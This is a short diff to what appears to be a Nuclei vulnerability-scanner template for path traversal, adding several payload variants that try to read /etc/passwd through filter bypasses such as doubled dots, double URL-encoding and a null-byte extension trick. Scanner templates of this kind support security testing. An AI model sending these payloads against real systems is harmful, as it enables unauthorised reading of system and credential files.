--- a/templatesNuclei/PathTraversal/general-path-traversal.yaml
+++ b/templatesNuclei/PathTraversal/general-path-traversal.yaml
@@ -20,6 +20,11 @@ http:
     payloads:
       param:
         - ../../../../../../etc/passwd
+        - /etc/passwd
+        - ....//....//....//etc/passwd
+        - ..%252f..%252f..%252fetc/passwd
+        - /var/www/images/../../../etc/passwd
+        - ../../../etc/passwd%00.png
 
     extractors:
       - type: regex
